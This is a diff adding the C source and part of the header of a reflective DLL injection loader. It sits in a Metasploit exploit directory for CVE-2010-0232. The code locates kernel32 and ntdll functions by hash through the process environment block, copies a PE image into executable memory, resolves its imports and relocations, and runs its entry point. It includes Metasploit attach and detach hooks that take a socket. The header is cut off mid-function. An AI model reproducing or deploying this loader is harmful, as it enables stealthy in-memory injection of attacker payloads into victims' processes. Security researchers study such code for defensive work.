external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.c

@@ -0,0 +1,599 @@
+//===============================================================================================//
+// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#include "ReflectiveLoader.h"
+//===============================================================================================//
+// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
+HINSTANCE hAppInstance = NULL;
+//===============================================================================================//
+#pragma intrinsic( _ReturnAddress )
+// This function can not be inlined by the compiler or we will not get the address we expect. Ideally 
+// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of 
+// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics 
+// available (and no inline asm available under x64).
+__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); }
+//===============================================================================================//
+
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+#define OUTPUTDBG(str) pOutputDebug((LPCSTR)str)
+#else /* ENABLE_OUTPUTDEBUGSTRING */
+#define OUTPUTDBG(str) do{}while(0)
+#endif
+
+// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,  
+//         otherwise the DllMain at the end of this file will be used.
+
+// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
+//         otherwise it is assumed you are calling the ReflectiveLoader via a stub.
+
+// This is our position independent reflective DLL loader/injector
+#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
+#else
+DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID )
+#endif
+{
+	// the functions we need
+	LOADLIBRARYA pLoadLibraryA     = NULL;
+	GETPROCADDRESS pGetProcAddress = NULL;
+	VIRTUALALLOC pVirtualAlloc     = NULL;
+	NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
+#ifdef ENABLE_STOPPAGING
+	VIRTUALLOCK pVirtualLock	   = NULL;
+#endif
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+	OUTPUTDEBUG pOutputDebug       = NULL;
+#endif
+
+	USHORT usCounter;
+
+	// the initial location of this image in memory
+	ULONG_PTR uiLibraryAddress;
+	// the kernels base address and later this images newly loaded base address
+	ULONG_PTR uiBaseAddress;
+
+	// variables for processing the kernels export table
+	ULONG_PTR uiAddressArray;
+	ULONG_PTR uiNameArray;
+	ULONG_PTR uiExportDir;
+	ULONG_PTR uiNameOrdinals;
+	DWORD dwHashValue;
+
+	// variables for loading this image
+	ULONG_PTR uiHeaderValue;
+	ULONG_PTR uiValueA;
+	ULONG_PTR uiValueB;
+	ULONG_PTR uiValueC;
+	ULONG_PTR uiValueD;
+	ULONG_PTR uiValueE;
+
+	// STEP 0: calculate our images current base address
+
+	// we will start searching backwards from our callers return address.
+	uiLibraryAddress = caller();
+
+	// loop through memory backwards searching for our images base address
+	// we dont need SEH style search as we shouldnt generate any access violations with this
+	while( TRUE )
+	{
+		if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
+		{
+			uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
+			// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
+			// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
+			if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
+			{
+				uiHeaderValue += uiLibraryAddress;
+				// break if we have found a valid MZ/PE header
+				if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
+					break;
+			}
+		}
+		uiLibraryAddress--;
+	}
+
+	// STEP 1: process the kernels exports for the functions our loader needs...
+
+	// get the Process Enviroment Block
+#ifdef _WIN64
+	uiBaseAddress = __readgsqword( 0x60 );
+#else
+#ifdef WIN_ARM
+	uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 );
+#else _WIN32
+	uiBaseAddress = __readfsdword( 0x30 );
+#endif
+#endif
+
+	// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
+	uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
+
+	// get the first entry of the InMemoryOrder module list
+	uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
+	while( uiValueA )
+	{
+		// get pointer to current modules name (unicode string)
+		uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
+		// set bCounter to the length for the loop
+		usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
+		// clear uiValueC which will store the hash of the module name
+		uiValueC = 0;
+
+		// compute the hash of the module name...
+		do
+		{
+			uiValueC = ror( (DWORD)uiValueC );
+			// normalize to uppercase if the module name is in lowercase
+			if( *((BYTE *)uiValueB) >= 'a' )
+				uiValueC += *((BYTE *)uiValueB) - 0x20;
+			else
+				uiValueC += *((BYTE *)uiValueB);
+			uiValueB++;
+		} while( --usCounter );
+
+		// compare the hash with that of kernel32.dll
+		if( (DWORD)uiValueC == KERNEL32DLL_HASH )
+		{
+			// get this modules base address
+			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
+
+			// get the VA of the modules NT Header
+			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
+
+			// uiNameArray = the address of the modules export directory entry
+			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
+
+			// get the VA of the export directory
+			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
+
+			// get the VA for the array of name pointers
+			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
+			
+			// get the VA for the array of name ordinals
+			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
+
+			usCounter = 3;
+#ifdef ENABLE_STOPPAGING
+			usCounter++;
+#endif
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+			usCounter++;
+#endif
+
+			// loop while we still have imports to find
+			while( usCounter > 0 )
+			{
+				// compute the hash values for this function name
+				dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
+				
+				// if we have found a function we want we get its virtual address
+				if( dwHashValue == LOADLIBRARYA_HASH
+					|| dwHashValue == GETPROCADDRESS_HASH
+					|| dwHashValue == VIRTUALALLOC_HASH
+#ifdef ENABLE_STOPPAGING
+					|| dwHashValue == VIRTUALLOCK_HASH
+#endif
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+					|| dwHashValue == OUTPUTDEBUG_HASH
+#endif
+					)
+				{
+					// get the VA for the array of addresses
+					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
+
+					// use this functions name ordinal as an index into the array of name pointers
+					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
+
+					// store this functions VA
+					if( dwHashValue == LOADLIBRARYA_HASH )
+						pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
+					else if( dwHashValue == GETPROCADDRESS_HASH )
+						pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
+					else if( dwHashValue == VIRTUALALLOC_HASH )
+						pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
+#ifdef ENABLE_STOPPAGING
+					else if( dwHashValue == VIRTUALLOCK_HASH )
+						pVirtualLock = (VIRTUALLOCK)( uiBaseAddress + DEREF_32( uiAddressArray ) );
+#endif
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+					else if( dwHashValue == OUTPUTDEBUG_HASH )
+						pOutputDebug = (OUTPUTDEBUG)( uiBaseAddress + DEREF_32( uiAddressArray ) );
+#endif
+			
+					// decrement our counter
+					usCounter--;
+				}
+
+				// get the next exported function name
+				uiNameArray += sizeof(DWORD);
+
+				// get the next exported function name ordinal
+				uiNameOrdinals += sizeof(WORD);
+			}
+		}
+		else if( (DWORD)uiValueC == NTDLLDLL_HASH )
+		{
+			// get this modules base address
+			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
+
+			// get the VA of the modules NT Header
+			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
+
+			// uiNameArray = the address of the modules export directory entry
+			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
+
+			// get the VA of the export directory
+			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
+
+			// get the VA for the array of name pointers
+			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
+			
+			// get the VA for the array of name ordinals
+			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
+
+			usCounter = 1;
+
+			// loop while we still have imports to find
+			while( usCounter > 0 )
+			{
+				// compute the hash values for this function name
+				dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
+				
+				// if we have found a function we want we get its virtual address
+				if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
+				{
+					// get the VA for the array of addresses
+					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
+
+					// use this functions name ordinal as an index into the array of name pointers
+					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
+
+					// store this functions VA
+					if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
+						pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) );
+
+					// decrement our counter
+					usCounter--;
+				}
+
+				// get the next exported function name
+				uiNameArray += sizeof(DWORD);
+
+				// get the next exported function name ordinal
+				uiNameOrdinals += sizeof(WORD);
+			}
+		}
+
+		// we stop searching when we have found everything we need.
+		if( pLoadLibraryA
+			&& pGetProcAddress
+			&& pVirtualAlloc
+#ifdef ENABLE_STOPPAGING
+			&& pVirtualLock
+#endif
+			&& pNtFlushInstructionCache
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+			&& pOutputDebug
+#endif
+			)
+			break;
+
+		// get the next entry
+		uiValueA = DEREF( uiValueA );
+	}
+
+	// STEP 2: load our image into a new permanent location in memory...
+
+	// get the VA of the NT Header for the PE to be loaded
+	uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
+
+	// allocate all the memory for the DLL to be loaded into. we can load at any address because we will  
+	// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
+	uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+
+#ifdef ENABLE_STOPPAGING
+	// prevent our image from being swapped to the pagefile
+	pVirtualLock((LPVOID)uiBaseAddress, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage);
+#endif
+
+	// we must now copy over the headers
+	uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
+	uiValueB = uiLibraryAddress;
+	uiValueC = uiBaseAddress;
+
+	while( uiValueA-- )
+		*(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;
+
+	// STEP 3: load in all of our sections...
+
+	// uiValueA = the VA of the first section
+	uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
+	
+	// itterate through all sections, loading them into memory.
+	uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
+	while( uiValueE-- )
+	{
+		// uiValueB is the VA for this section
+		uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
+
+		// uiValueC if the VA for this sections data
+		uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
+
+		// copy the section over
+		uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
+
+		while( uiValueD-- )
+			*(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
+
+		// get the VA of the next section
+		uiValueA += sizeof( IMAGE_SECTION_HEADER );
+	}
+
+	// STEP 4: process our images import table...
+
+	// uiValueB = the address of the import directory
+	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
+	
+	// we assume there is an import table to process
+	// uiValueC is the first entry in the import table
+	uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
+	
+	// iterate through all imports until a null RVA is found (Characteristics is mis-named)
+	while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Characteristics )
+	{
+		OUTPUTDBG("Loading library: ");
+		OUTPUTDBG((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name));
+		OUTPUTDBG("\n");
+
+		// use LoadLibraryA to load the imported module into memory
+		uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
+
+		if ( !uiLibraryAddress )
+		{
+			OUTPUTDBG("Loading library FAILED\n");
+
+			uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
+			continue;
+		}
+
+		// uiValueD = VA of the OriginalFirstThunk
+		uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
+	
+		// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
+		uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
+
+		// itterate through all imported functions, importing by ordinal if no name present
+		while( DEREF(uiValueA) )
+		{
+			// sanity check uiValueD as some compilers only import by FirstThunk
+			if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
+			{
+				// get the VA of the modules NT Header
+				uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
+
+				// uiNameArray = the address of the modules export directory entry
+				uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
+
+				// get the VA of the export directory
+				uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
+
+				// get the VA for the array of addresses
+				uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
+
+				// use the import ordinal (- export ordinal base) as an index into the array of addresses
+				uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
+
+				// patch in the address for this imported function
+				DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
+			}
+			else
+			{
+				// get the VA of this functions import by name struct
+				uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
+
+				OUTPUTDBG("Resolving function: ");
+				OUTPUTDBG(((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name);
+				OUTPUTDBG("\n");
+
+				// use GetProcAddress and patch in the address for this imported function
+				DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
+			}
+			// get the next imported function
+			uiValueA += sizeof( ULONG_PTR );
+			if( uiValueD )
+				uiValueD += sizeof( ULONG_PTR );
+		}
+
+		// get the next import
+		uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
+	}
+
+	// STEP 5: process all of our images relocations...
+
+	// calculate the base address delta and perform relocations (even if we load at desired image base)
+	uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
+
+	// uiValueB = the address of the relocation directory
+	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
+
+	// check if their are any relocations present
+	if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
+	{
+		// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
+		uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
+
+		// and we itterate through all entries...
+		while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
+		{
+			// uiValueA = the VA for this relocation block
+			uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
+
+			// uiValueB = number of entries in this relocation block
+			uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
+
+			// uiValueD is now the first entry in the current relocation block
+			uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
+
+			// we itterate through all the entries in the current block...
+			while( uiValueB-- )
+			{
+				// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
+				// we dont use a switch statement to avoid the compiler building a jump table
+				// which would not be very position independent!
+				if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
+					*(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
+				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
+					*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
+#ifdef WIN_ARM
+				// Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem.
+				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T )
+				{	
+					register DWORD dwInstruction;
+					register DWORD dwAddress;
+					register WORD wImm;
+					// get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word)
+					dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) );
+					// flip the words to get the instruction as expected
+					dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
+					// sanity chack we are processing a MOV instruction...
+					if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT )
+					{
+						// pull out the encoded 16bit value (the high portion of the address-to-relocate)
+						wImm  = (WORD)( dwInstruction & 0x000000FF);
+						wImm |= (WORD)((dwInstruction & 0x00007000) >> 4);
+						wImm |= (WORD)((dwInstruction & 0x04000000) >> 15);
+						wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4);
+						// apply the relocation to the target address
+						dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF;
+						// now create a new instruction with the same opcode and register param.
+						dwInstruction  = (DWORD)( dwInstruction & ARM_MOV_MASK2 );
+						// patch in the relocated address...
+						dwInstruction |= (DWORD)(dwAddress & 0x00FF);
+						dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4;
+						dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15;
+						dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4;
+						// now flip the instructions words and patch back into the code...
+						*(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
+					}
+				}
+#endif
+				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
+					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
+				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
+					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
+
+				// get the next entry in the current relocation block
+				uiValueD += sizeof( IMAGE_RELOC );
+			}
+
+			// get the next entry in the relocation directory
+			uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
+		}
+	}
+
+	// STEP 6: call our images entry point
+
+	// uiValueA = the VA of our newly loaded DLL/EXE's entry point
+	uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
+
+	OUTPUTDBG("Flushing the instruction cache");
+	// We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
+	pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 );
+
+	// call our respective entry point, fudging our hInstance value
+#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+	// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
+	((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
+#else
+	// if we are injecting an DLL via a stub we call DllMain with no parameter
+	((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
+#endif
+
+	// STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
+	return uiValueA;
+}
+//===============================================================================================//
+#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+
+// you must implement this function...
+extern DWORD DLLEXPORT Init( SOCKET socket );
+
+BOOL MetasploitDllAttach( SOCKET socket )
+{
+	Init( socket );
+	return TRUE;
+}
+
+BOOL MetasploitDllDetach( DWORD dwExitFunc )
+{
+	switch( dwExitFunc )
+	{
+		case EXITFUNC_SEH:
+			SetUnhandledExceptionFilter( NULL );
+			break;
+		case EXITFUNC_THREAD:
+			ExitThread( 0 );
+			break;
+		case EXITFUNC_PROCESS:
+			ExitProcess( 0 );
+			break;
+		default:
+			break;
+	}
+
+	return TRUE;
+}
+
+BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
+{
+    BOOL bReturnValue = TRUE;
+
+	switch( dwReason ) 
+    { 
+		case DLL_METASPLOIT_ATTACH:
+			bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
+			break;
+		case DLL_METASPLOIT_DETACH:
+			bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
+			break;
+		case DLL_QUERY_HMODULE:
+			if( lpReserved != NULL )
+				*(HMODULE *)lpReserved = hAppInstance;
+			break;
+		case DLL_PROCESS_ATTACH:
+			hAppInstance = hinstDLL;
+			break;
+		case DLL_PROCESS_DETACH:
+		case DLL_THREAD_ATTACH:
+		case DLL_THREAD_DETACH:
+            break;
+    }
+	return bReturnValue;
+}
+
+#endif
+//===============================================================================================//

external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.h

@@ -0,0 +1,223 @@
+//===============================================================================================//
+// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
+#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
+//===============================================================================================//
+#define WIN32_LEAN_AND_MEAN
+#include <windows.h>
+#include <Winsock2.h>
+#include <intrin.h>
+
+#include "ReflectiveDLLInjection.h"
+
+// Enable this define to turn on OutputDebugString support
+//#define ENABLE_OUTPUTDEBUGSTRING 1
+
+// Enable this define to turn on locking of memory to prevent paging
+#define ENABLE_STOPPAGING 1
+
+#define EXITFUNC_SEH		0xEA320EFE
+#define EXITFUNC_THREAD		0x0A2A1DE0
+#define EXITFUNC_PROCESS	0x56A2B5F0
+
+typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
+typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
+typedef LPVOID  (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
+typedef DWORD  (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
+
+#define KERNEL32DLL_HASH				0x6A4ABC5B
+#define NTDLLDLL_HASH					0x3CFA685D
+
+#define LOADLIBRARYA_HASH				0xEC0E4E8E
+#define GETPROCADDRESS_HASH				0x7C0DFCAA
+#define VIRTUALALLOC_HASH				0x91AFCA54
+#define NTFLUSHINSTRUCTIONCACHE_HASH	0x534C0AB8
+
+#ifdef ENABLE_STOPPAGING
+typedef LPVOID  (WINAPI * VIRTUALLOCK)( LPVOID, SIZE_T );
+#define VIRTUALLOCK_HASH				0x0EF632F2
+#endif
+
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+typedef LPVOID  (WINAPI * OUTPUTDEBUG)( LPCSTR );
+#define OUTPUTDEBUG_HASH				0x470D22BC
+#endif
+
+#define IMAGE_REL_BASED_ARM_MOV32A		5
+#define IMAGE_REL_BASED_ARM_MOV32T		7
+
+#define ARM_MOV_MASK					(DWORD)(0xFBF08000)
+#define ARM_MOV_MASK2					(DWORD)(0xFBF08F00)
+#define ARM_MOVW						0xF2400000
+#define ARM_MOVT						0xF2C00000
+
+#define HASH_KEY						13
+//===============================================================================================//
+#pragma intrinsic( _rotr )
+
+__forceinline DWORD ror( DWORD d )
